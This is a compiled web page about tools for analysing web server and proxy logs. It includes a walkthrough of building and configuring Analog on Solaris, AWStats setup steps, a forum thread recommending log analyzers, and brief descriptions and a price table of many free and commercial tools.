$ make cd src && make make[1]: Entering directory `/export/home/henrystocker/analog-6.0/src' gcc -O2 -DUNIX -c alias.c gcc -O2 -DUNIX -c analog.c gcc -O2 -DUNIX -c cache.c ... omitted output ... Undefined first referenced symbol in file gethostbyaddr alias.o inet_addr alias.o ld: fatal: Symbol referencing errors. No output written to ../analog collect2: ld returned 1 exit status make[1]: *** [analog] Error 1 make[1]: Leaving directory `/export/home/henrystocker/analog-6.0/src' make: *** [analog] Error 2I soon figured out that I needed to make a small change to one of my Makefiles. I made the change with this perl command, adding the network services library after noting that the man pages for the undefined symbols both referenced -lnsl.$ cd src $ perl -i -p -e "s/LIBS = -lm/LIBS = -lnsl -lm/" Makefile My LIBS line then looked like this: LIBS = -lnsl -lm (added -lnsl) After this change, Analog compiled without a hitch: $ cd .. $ make cd src && make make[1]: Entering directory `/export/home/shs/analog-6.0/src' gcc -O2 -DUNIX -c alias.c gcc -O2 -DUNIX -c analog.c gcc -O2 -DUNIX -c cache.c ... omitted output ... gcc -O2 -o ../analog alias.o analog.o cache.o dates.o globals.o hash.o init.o init2.o input.o macinput.o macstuff.o output.o output2.o outcro.o outhtml.o outlatex.o outplain.o outxhtml.o outxml.o process.o settings.o sort.o tree.o utils.o win32.o libgd/gd.o libgd/gd_io.o libgd/gd_io_file.o libgd/gd_png.o libgd/gdfontf.o libgd/gdfonts.o libgd/gdtables.o libpng/png.o libpng/pngerror.o libpng/pngmem.o libpng/pngset.o libpng/pngtrans.o libpng/pngwio.o libpng/pngwrite.o libpng/pngwtran.o libpng/pngwutil.o pcre/pcre.o zlib/adler32.o zlib/compress.o zlib/crc32.o zlib/deflate.o zlib/gzio.o zlib/infblock.o zlib/infcodes.o zlib/inffast.o zlib/inflate.o zlib/inftrees.o zlib/infutil.o zlib/trees.o zlib/uncompr.o zlib/zutil.o unzip/ioapi.o unzip/unzip.o bzip2/bzlib.o bzip2/blocksort.o bzip2/compress.o bzip2/crctable.o bzip2/decompress.o bzip2/huffman.o bzip2/randtable.o -lnsl -lm make[1]: Leaving directory `/export/home/shs/analog-6.0/src' $ ls -l analog -rwxr-xr-x 1 root other 577568 Mar 29 19:34 analogOnce Analog was compiled, I moved it into /usr/local/bin (there was no "make install" option) and ran a "make clean" to remove object files. At this point, I had switched over to root.The next step was setting up a configuration file to give Analog some directions on how I wanted it to work. Analog comes with example configuration files and there are numerous options that can be used to customize your reports, but I wanted to start with something simple, so I set up a handful of options and installed the file as /usr/local/bin/analog.cfg:
# cat > /usr/local/bin/analog.cfg << EOF > LANGFILE usa.lng > HOSTNAME boson.particles.org > HOSTURL "http://boson.particles.org" > DAILYSUM ON > DAILYREP ON > LOGFILE /opt/apache/logs/access_log > OUTFILE /opt/apache/htdocs/webstats.html > DOMAINSFILE usdom.tab > EOFI also had to create a directory named /usr/local/bin/lang and copy the usa.lng file and usdom.tab files from my lang directory into it.# mkdir /usr/local/bin/lang # cp lang/usa.lng /usr/local/bin/lang # cp lang/usdom.tab /usr/local/bin/langI then ran the report like this:# analog /opt/apache/logs/access_log
My processed report appeared in my /opt/apache/htdocs directory along with four image files containing pie charts for some of my statistics. You can see a sample Analog report here.
Here's a list of features that you can turn off or on: MONTHLY ON # one line for each month WEEKLY ON # one line for each week DAILYREP ON # one line for each day DAILYSUM ON # one line for each day of the week HOURLYREP ON # one line for each hour of the day GENERAL ON # the General Summary at the top REQUEST ON # which files were requested FAILURE ON # which files were not found DIRECTORY ON # Directory Report HOST ON # which computers requested files ORGANISATION ON # which organisations they were from DOMAIN ON # which countries they were in REFERRER ON # where people followed links from FAILREF ON # where people followed broken links from SEARCHQUERY ON # the phrases and words they used... SEARCHWORD ON # ...to find you from search engines BROWSERSUM ON # which browser types people were using OSREP ON # and which operating systems FILETYPE ON # types of file requested SIZE ON # sizes of files requested STATUS ON # number of each type of success and failure
Download Internet Access Monitor for Squid free - 2.01 MbInternet Access Monitor is a comprehensive Internet use monitoring and reporting utility for corporate networks. The program takes advantage of the fact that most corporations provide Internet access through proxy servers, like MS ISA Server, WinGate, WinRoute, MS Proxy, WinProxy, EServ, Squid, Proxy Plus and others. Each time any user accesses any website, downloads files or images, these actions are logged. Internet Access Monitor processes these log files to offer system administrators wealth of report building options. The program can build reports for individual users, showing the list of websites he or she visited, along with a detailed break down of internet activity (downloading, reading text, viewing pictures, watching movies, listening to music, working). Plus, the program can create comprehensive reports with analysis of overall bandwidth consumption, building easy to comprehend visual charts that suggest the areas where wasteful bandwidth consumption may be eliminated.
There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's, awstats however is both free, and up to date. It looks a bit like web trends (though I haven't used web trends in several years). Here's an online demo. awstats can be used on several web servers including IIS, and Apache. You can either have generate static html files, or run with a perl script in the cgi-bin.
Here's a quick rundown of setting it up on unix/apache
Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf the directives for the configuration file can be found here: http://awstats.sourceforge.net/docs/awstats_config.html they also provide a default conf file in cgi-bin/awstats.model.conf you can use this as a base.
Make sure your log files are using NCSA combined format, this is usually done in apache by saying CustomLog /logs/access.log combined you can use other formats but you have to customize the conf file.
You will probably want to edit the LogFile directive to point to where your logfile is stored, SiteDomain this is the main domain for the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the awstats databases will be stored (each site will have its own file in the directory).
Once that is setup you will want to update the database this is done from the command line by running
perl awstats.pl -config=sitename -updateNow copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl if you want to view other domains use /cgi-bin/awstats.pl?config=othersitename
Where sitename would be the name of your config file awstats.sitename.conf
If you want to generate static html files run the
awstats_buildstaticpages.pl
script found in the tools folder. You have to give it the path to theawstats.pl
perl script, and a directory to put the static html files in.perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl -dir=/web/stats/sitename/More setup info can be found here: http://awstats.sourceforge.net/docs/index.html
AWStats is a free powerful and featureful tool that generates advanced web, ftp or mail server statistics, graphically. This log analyzer works as a CGI or from command line and shows you all possible information your log contains, in few graphical web pages. It uses a partial information file to be able to process large log files, often and quickly. It can analyze log files from IIS (W3C log format), Apache log files (NCSA combined/XLF/ELF log format or common/CLF log format), WebStar and most of all web, proxy, wap, streaming servers, mail servers (and some ftp).
Take a look at this comparison table for an idea on differences between most famous statistics tools (AWStats, Analog, Webalizer,...).
AWStats is a free software distributed under the GNU General Public License. You can have a look at this license chart to know what you can/can't do.
As AWStats works from the command line but also as a CGI, it can work with major web hosting provider that allows CGI and log access.You can browse AWStats demo (Real-time feature to update stats from web has been disabled on demos) to see a sample of most important information AWStats shows you...
Squid2MySQL is an accounting system for squid. It includes monthly, daily, and timed detail levels, and uses MySQL for log storage.
Eugene V. Chernyshev <evc (at) chat (dot) ru> [contact developer]
I'm looking for access log analysis software that will run independently from the ACS. Hopefully the thing would read an AOLserver or Apache access log and generate some graphs and tables in a configurable way. Any specific suggestions? The goal is usage analysis for marketing purposes (i.e., not performance analysis). Probably running on Solaris and it doesn't have to be freeware.
-- S. Y., August 29, 2000
I've been using webalizer (http://www.webalizer.com). It's real easy to set up and configure. For a sample of what it does, check out http://www.badgertronics.com/reports
-- Mark Dalrymple, August 29, 2000And if you don't mind paying, NetTracker (from http://www.sane.com) has a ton of reports, handles big log files (a site we know that's using it has 600 meg daily access logs), handles cobranding, etc
-- Mark Dalrymple, August 29, 2000Nettracker rules! We've been using it for a couple of years now and everyone loves it. It has no knowledge of the ACS or it's users, of coures, so real clickstream tracking isn't really possible, but for basic log analysis with lots of information it's great.
-- Janine Sisk, August 29, 2000
I worked quite a while with NetAnalysis by the Boston-based company NetGen. It's database-backed log file analysis software, i .e. usually once per day you stuff your log file information into your db. This way you can keep track of your homepage's success over time. It also enables you to connect your webserver log information with information from other databases and come up with really powerful information. For example it has pretty damn good adaptors to Intershop and to Vignette StoryServer and you can implement your own adaptors with a Perl-based (soon to be Java) API. (Why do I know these adaptors are good? I made the one for Intershop work properly and I specified the one for my former company's Vignette StoryServer standard installation ;)
The software to run analysis on your log is very smartly configurable and you have good metrics and I was promised some really powerful metrics for a future release (that should be out as of now).
It runs on Solaris and you'll need Oracle and a pretty heavy machine (way bigger than your webserver usually).
Other products I know about are Accrue (used to be based on sniffing TCP/IP packets) and iDecide by Informix (has another name these days) that are db-backed as well. Oh, and then I once met with a Canadian company that use JavaScript to spy out some information about the client. It was probably the most expensive software regarding costs/line of code - tho they had very, very, very good metrics. You can head over to playboy.com and look for a JS call on their entry site ;)
regards Dirk
-- Dirk Gómez, August 30, 2000
I have had great success with 'analog' a free utility for log parsing and analysis. It can generate simple reports and also machine readable reports (good for DB backed summary generation). There is also a perl based package called 'Report Magic' which takes the machine readable output and makes pretty pictures and tables for you.
The problem with many Log analysis tools is that they cannot be consumate and definately cannot reflect the structure of your particular site especially if it has 'interesting' mechanisms by which content is rendered - frames, multiple urls for a given page etc. Also, when you get ~ 1GB of log data a day, some cjust croak big time. In this case, rolling-your-own is one solution whih I have been implementing (using perl -regexp is you friend- and DB) which follows some of the principles discussed at ASJ/. It also allows for simple reporting on only the bits n pieces I feel necessary - quick with HUGE sets of data.
This is a good technique for allowing ad-hoc queries on data but make sure you have a reasonably hefty machine (Dual Xeon with 2GB RAM, 100GB RAID).
I guess if there is a package out there which is extensible and modular (plugin support as mentioned above) then that may also be quite useful.
It's important to define exactly what info is most important in analysing logs else you can open up a huge can of worms - ie. mapping all relationships between everything which whilst interesting, is quite difficult and reasonalby useless unless it is quick and can add value in some way.
Sorry if I've stated the obvious, just my $0.05
-- geoff webb, September 4, 2000
Look carefully before you choose NetTracker. It scans the log files and saves the data into its own flat file database. If you ever lose files or decide that you want to add another report, it needs to regenerate all of that data. For a month's worth of logs (the 600 MB+ logs referred to by Mark Dalrymple above), it can take 3+ days.
-- Doug Harris, September 11, 2000
page-stats.pl will examine the acceslog of a http daemon and search it for occurrences of certain references. These references are then counted and put into a HTML file that is ready to be displayed to the outside world as a "Page Statistics" page. Each page can be selected from the statistics page.
Big Brother Log Analyzer, or BBLA for short, is a package comprised of two components: a logger, which logs all accesses to selected web pages, and a log analyzer, which nicely formats the logs into an HTML page. The generated HTML is fully W3C compliant (HTML 4.01/Transitional), which guarantees that it will be rendered the way it should under any compliant browser. Another interesting feature of BBLA is that it is tag-based (you put a tag in each page you want to track): this allows for tracking pages hosted on different servers. For instance, I track accesses to my pages in the School of Information Management and Systems at the University of California, Berkeley, along with these pages hosted on SourceForge in a single file. See the demo for more information.
A lot of HTML log analyzers exist on the market, but most of them are either targeted at systems administrators (with full access to httpd log files, for instance), or require general users to display an advertising banner on their pages, or (even worse) limit the number of pages you can track for free. Most of the time, the pages generated do not even follow the W3C consortium recommendations for writing proper HTML, yielding unpredictable results when viewed with different browsers.
BBLA is free, doesn't require you to have a banner on your web page, uses W3C-compliant HTML and PNG images (hence, no licensing issues with GIFs), allows for tracking pages hosted on different servers, and is actually completely transparent. So, unless your visitors look into your HTML source, they won't notice that you are tracking them.
Last but not least, BBLA is extremely light-weight: the current tarball is roughly 30KB, making it much more easier to install on platforms with scarce disk space than some of its counterparts. As an added bonus, it doesn't take ages to compile, even on really ancient hardware.
freshmeat.net
Relax is a multi-platform Web server log analyzer written in Perl. It can be used to track which search engines, search keywords, and referring URLs led visitors to the Web site. It can also track down bad links and analyze which keywords to bid for at pay-per-click search engines. The parser module in Relax recognizes several hundred search engines and is capable of extracting the keywords used. Generated HTML reports can be configured to include links to other Web-based keyword analysis tools, making it easier to further improve the ranking of web pages in search engines.
freshmeat.net
proxy-report.pl generates a list of requested server addresses (simplified URLs) from your Squid proxy server log files. Requests for each URL are summarized on a per day basis. This script can generate reports based on the IP of the user. It also automatically handles gzipped files. URL exclusion patterns are supported. A sample report is available on the home page.
parses logfiles from Squid, NetCache, Inktomi Traffic Server,
O'Reilly NetworkIn this column I'll give you a gentle introduction to Apache web server logs and their place in monitoring, security, marketing, and feedback."
stoic Freeware web server log analysis tool Jul 05th 1999, 05:52
stable: 1.2 - devel: none license: FreewareStoic is a small Perl script that examines Apache or Netscape web server access logs. Reports include logfile totals, domains visiting, top documents requested, browser agent statistics, platform statistics and a bunch of other stuff.
Download: ftp://ftp.mrunix.net/pub/webalizer/ Alternate Download: ftp://samhain.unix.cslab.tuwien.ac.at/webalizer/ Homepage: http://www.mrunix.net/webalizer/ Changelog: ftp://ftp.mrunix.net/pub/webalizer/CHANGES The Webalizer is a web server log analysis program. It is designed to scan web server log files in various formats and produce usage statistics in HTML format for viewing through a browser. Very good output, good charts and very fast. Just missing special mode for a total statistics (all virtual webservers) without that many details.
Google matched content |
Book chapters
freshmeat.net Browse project tree - Topic Internet Log Analysis
Google Directory - Computers Software Internet Site Management Log Analysis
Produces highly detailed, easily configurable, incremental HTML usage reports in many languages, from multiple log formats, with builds for Linux, Solaris, Mac, OS/2, Cobalt, OpenVMS, Netware, and BeOS. [Open Source, GPL]
WebStats - xenia - set of perl scripts and sqlite database for apache web log analysis
logmanage is a program which is designed to perform flexible management of web statistics for a variety of users and main server logs. In its current configuration it is designed to work with http-analyze but should work with any web stats program that takes log input on STDIN and can be configured for the output directory on the command line. Manages a large collection of pipes to the stats program with inclusion and exclusion regular expressions. Can generate stats for lots of different users from one log file or from many log files.
Recycle-logs is a logfile manager written in Perl that attempts to overcome the limitations of other system log utilities. File rotation and other customization is based on control information specified in one or several configuration files.
W3Perl is a Web logfile analyzer. All major Web stats are available (referrer, agent, session, error, etc.). Reports are fully customizable via configuration files, and there is an administration interface control available.
Webalizer The Webalizer is a fast, free web server log file analysis program. It produces highly detailed, easily configurable usage reports in HTML format, for easy viewing with a standard web browser.
The wwwstat program will process a sequence of HTTPd common logfile format (CLF) access_log files and output a log summary in HTML format suitable for publishing on a website.
The splitlog program will process a sequence of CLF (or CLF with a prefix) access_log files and split the entries into separate files according to the requested URL and/or vhost prefix.
Both programs are written in Perl and, once customized for your site, should work on any UNIX-based system with Perl 4.036, 5.002, or better.
Qiegang Long, formerly at UMass, has released a program called gwstat that takes the output from wwwstat and generates a set of graphs to illustrate your httpd server traffic by hour, day, week or calling country/domain.
A mailing list, now shut down, was created for discussion and support of wwwstat development.
Log Scanner was written to watch for anomalies in log files. Upon finding them, it can notify you in a variety of ways. It was designed to be very modular and configurable. Unlike most other log scanners, this one has more than single pattern matches. It will allow you to trigger notifications on multiple occurrences of one or several events.
The problem with many Log analysis tools is that they cannot be consumate and definately cannot reflect the structure of your particular site especially if it has 'interesting' mechanisms by which content is rendered - frames, multiple urls for a given page etc. Also, when you get ~ 1GB of log data a day, some cjust croak big time. In this case, rolling-your-own is one solution whih I have been implementing (using perl -regexp is you friend- and DB) which follows some of the principles discussed at ASJ/. It also allows for simple reporting on only the bits n pieces I feel necessary - quick with HUGE sets of data.
FlashStats | Mac Unix Windows |
$99/$249 | Maximized Software | |
HTTP-Analyze | Unix Windows |
free/326 euro/388 euro/1470 euro | http://www.http-analyze.org/ | |
Lumberjack | Unix | $1250 | BitWrench Inc | |
NetTracker | Unix, Windows | from $495 | Sane Solutions | |
WebTrends | Windows Solaris Red Hat |
$499 - $1999 | NetIQ | |
Sawmill | Mac Unix Windows |
$999 Substantial discounts for edu & small organisations | sawmill.net |
Web Trends -- actually a pretty limited commercial package. Decent prepackaged reporting capabilities, but not very flexible (reports for dummies)
EasyLog version 1.2
This is a simple Server Side Includes script that can "watch" a given page, and add entries to
a HTML file reporting what browser they are using, when they accessed your page, and a few other pieces
of information. Language: Perl Platform: Unix
View Product Homepage
Checklog version 1.0
Perl script that analyzes HTTP server logs.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.010M bytes
Click file name to view online:
checklog.pl,
14504 bytes
FTPWebLog version 1.0.3
Perl script that analyses WWW and FTP logs and produces graphical reports.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.096M bytes
Relax version 2.0
Relax is a free reference log analysis program written in Perl, which can be used to analyse how people
are finding your web site, what keywords they use in the search engines, and how they move within the
site.
Language: Perl Platform: Unix, Windows
Download Complete Source Code, 0.010M bytes
Log Reverse Domain Name System (lrdns) version 1.1 -- Converts numeric IP addresses in accesss log files into textual domain names. Language: Perl Platform: Unix
Download Complete Source Code, 0.010M bytes
See also
Society
Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers : Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism : The Iron Law of Oligarchy : Libertarian Philosophy
Quotes
War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda : SE quotes : Language Design and Programming Quotes : Random IT-related quotes : Somerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose Bierce : Bernard Shaw : Mark Twain Quotes
Bulletin:
Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 : Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law
History:
Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds : Larry Wall : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOS : Programming Languages History : PL/1 : Simula 67 : C : History of GCC development : Scripting Languages : Perl history : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history
Classic books:
The Peter Principle : Parkinson Law : 1984 : The Mythical Man-Month : How to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite
Most popular humor pages:
Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor
The Last but not Least Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand ~Archibald Putt. Ph.D
Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.
This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...
|
You can use PayPal to to buy a cup of coffee for authors of this site |
Disclaimer:
The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.
Last modified: January 09, 2020